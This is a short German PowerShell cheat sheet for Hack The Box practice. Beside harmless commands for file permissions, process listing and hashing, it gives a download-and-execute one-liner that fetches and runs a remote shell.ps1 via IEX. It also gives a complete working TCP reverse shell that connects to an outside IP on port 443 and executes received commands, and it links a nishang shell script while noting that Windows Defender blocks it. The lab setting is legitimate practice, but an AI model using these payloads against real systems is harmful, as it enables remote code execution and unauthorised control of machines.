Powershell Cheat Sheet (HTB)
WIP Cheat Sheet für PowerShell Befehle welche ich immer mal wieder (u.a. im Zusammenhang mit HTB benötige)
Datei über Powershell downloaden und ausführen
"powershell.exe "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.3/shell.ps1\");"Powershell Reverse Shell
$client = New-Object System.Net.Sockets.TCPClient("10.10.15.36",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()Am besten verwendet man jedoch gleich die nishang shell (wird jedoch vom Windows Defender geblockt)
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1
Datei Downloaden und speichern
wget "http://www.contoso.com" -outfile "file"Datei und Ordner Berechtigungen anzeigen
Get-Acl -Path C:\temp | Format-List
dir | get-aclaktive Prozesse anzeigen
Get-ProcessMD5 Hashsumme von Datei erzeugen
CertUtil -hashfile <path to file> MD5